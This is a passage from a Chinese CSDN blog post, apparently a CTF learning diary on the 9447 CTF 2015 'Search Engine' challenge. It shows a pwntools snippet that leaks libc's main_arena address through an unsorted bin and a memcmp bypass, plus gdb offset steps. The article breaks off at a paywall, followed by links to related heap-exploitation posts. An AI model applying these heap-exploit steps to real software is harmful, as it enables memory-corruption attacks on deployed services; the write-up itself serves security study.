新姿势GET 通过unsorted bin泄露libc地址 与 fastbin double free

最新推荐文章于 2023-04-06 20:03:06 发布
最新推荐文章于 2023-04-06 20:03:06 发布
阅读量1.9k 收藏 5
点赞数 4
分类专栏: 学习日记 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42151611/article/details/98087790
版权
源文件

GitHub

checksec

初步分析



利用方法

  1. 用sentence函数分配small bin大小的bin,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字段,即main_arena + offset

    payload = 'a'*0x7e+' w'
sentence(payload)
search('w')
io.recv()
io.sendline('y')
search('\x00')
io.recvuntil('Found '+str(len(payload))+': ')
main_arena = u64(io.recv(6).ljust(8,'\x00'))
log.success('main arena + offset: '+hex(main_arena))

    得到:[+] main arena: 0x7f88c072bb78
    再在代码后面加上

    gdb.attach(io)
raw_input()

    然后再在弹出的gdb窗口中输入x/gx 0x7f88c072bb78
    就得到了offset
    0x7f88c072bb78 <main_arena+88>: 0x0000000002590120

    于是代码中main_arena的地址就要减去88

  2. 新开一个终端,在终端中输入cat /proc/pidof search/maps

    00400000-00402000 r-xp 00000000 08:01 402114                             	/home/dajun/binary/pwn/9447 CTF  2015: Search Engine/search
00601000-00602000 r--p 00001000 08:01 402114                             	/home/dajun/binary/pwn/9447 CTF  2015: Search Engine/search
00602000-00603000 rw-p 00002000 08:01 402114                             	/home/dajun/binary/pwn/9447 CTF  2015: Search Engine/search
0258f000-025b1000 rw-p 00000000 00:00 0                                  [heap]
7f88c0367000-7f88c0527000 r
最低0.47元/天 解锁文章
哒君
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3153
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast binlibc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 342
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结
seaaseesa的博客
04-17 1026
glibc从堆任意分配到攻击IO流达到泄露信息&realloc特性&unsorted bin expand总结 有些情况下,仅有malloc/calloc/realloc和free两种功能,并且可以实现任意地址分配,如果想要达到利用,还需要知道地址,在glibc下,一般就是攻击_IO_2_1_stdout_结构体来实现信息泄露,通过低字节覆盖unsorted bin留下的main...
[pwn]堆:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要是我们能够修改“已释放”堆块。通常情况下与double fr...
堆漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3143
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构: fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
Smallest-Difference-In-Unsorted-Arrays
04-20
由于数组是未排序的,我们不能直接通过比较相邻元素来找到最小差值。一种常见的解决方案是先对两个数组进行排序,然后使用双指针技术进行查找。 以下是一种可能的Java实现步骤: 1. **排序**:使用Java内置的`...
javalruleetcode-leetcode-unsorted:leetcode未排序
06-29
java lru leetcode 力码 # 标题 解决方案 运行 22 31 1 毫秒 42 1 毫秒 46 2 毫秒 47 1 毫秒 56 5 毫秒 93 11 毫秒 103 1 毫秒 124 1 毫秒 128 6 毫秒 146 12 毫秒 150 5 毫秒 153 0 毫秒 199 ...毫秒
Unsorted-Notes:在这里放下随机笔记
04-05
我发现通过只使用好的部分并避免坏的部分,我可以成为一个更好的程序员。 毕竟,您如何利用不良零件制造出一些好的东西? Javascript的最佳部分包括: 功能松散类型(变量被声明为变量,没有类型) 动态物体对象...
find_max_element_in_unsorted_LL_iterative
04-17
find_max_element_in_unsorted_LL_iterative问题: class ListNode { constructor(value = 0, next = null) { this.value = value this.next = next }} function findMax(head) { // Write your code here....
漏洞利用与攻防实践2019-2020秋季_第 3 次课 - 2 - 堆利用1
08-03
堆内存分为不同类型的bins,如fastbin、normal bin、small bin、large bin和unsorted bin,它们分别对应不同大小的chunk,以优化内存分配效率。 内存分配函数包括malloc、calloc、realloc和free。malloc函数根据...
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 2801
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
hitcontraining_lab14学习(以及Unsorted Bin的个人理解
a2590035252的博客
09-16 1478
适合和我一样的菜鸡pwner
LCTF 2018 pwn easy_heap
hanabi_sh
11-04 723
LCTF 2018 pwn easy_heap,off-by-one,null-byte-overflow
【堆漏洞 - Unsorted bin/ Large bin Attack】
m0_52343643的博客
04-06 240
malloc 从 unsorted bin 取 chunk 的时候,如果对应的 tcache bin 还未装满,则会将 unsorted bin 里的 chunk 全部放进对应的 tcache bin,然后再从 tcache bin 中取出。使 unsorted chunk 大于链表中最小的 chunk 时的利用失效,必须使 unsorted chunk 小于链表中最小的 chunk。unsorted chunk 小于链表中最小的 chunk 的时候会执行前一句,反之执行后一句。
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 490
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
一道堆方向的pwn(double free & unsorted bins)
F_Day_的博客
10-17 812
一道堆方向的pwn(double free & unsorted bins)做题环境什么是double free 在某博客上看到了一道堆的题,博主说是入门的,嗯,那正好适合我,于是我花了一周终于出结果了。。。。。。 来看看我都遇到了什么问题 做题环境 Ubuntu 20.04.3 LTS,这是我在微软商店下载的子系统,也是一切万恶之源的开始 题目:Roc826 什么是double free 希望再次之前,你已经知道什么是堆了。 double free就是对一个堆free两次 在堆中,free后堆
CTF泄漏libc基址的方法
liucc09的博客
01-05 3947
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
堆漏洞挖掘——unsortedbin attack漏洞
董哥的黑板报
08-13 3185
一、核心思想 实现在任意地址写一个数值 局限性:通常unsortedbin attack只能够在目标地址写一个大数值 unsortedbin attack通常是为了配合fastbin attack而使用的 fastbin attack见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 二、原理图解 当从unsor...
Double Free浅析(泄露地址的一种方法)
omnispace的博客
04-18 7202
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...
FASTBIN CONSOLIDATION THRESHOLD, fastbin 中的chunk一般不会与其他chunk合并。但如果合并之后的chunk大于FASTBIN_CONSOLIDATION THRESHOLD ,就 会 触 发malloc consolidate()函数,将fastbin 中的 chunk 与其他 freechunk合并,然后移动到unsorted bin中。 #define FASTBIN CONSOLIDATION THRESHOLD (65536UL)
最新发布
07-20
该函数会将 fastbin 中的 chunk 与其他 free chunk 进行合并,并将合并后的 chunk 移动到 unsorted bin 中。 需要注意的是,这段代码可能是从某个特定上下文中提取的,我无法提供完整的代码和上下文。所以如果你...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值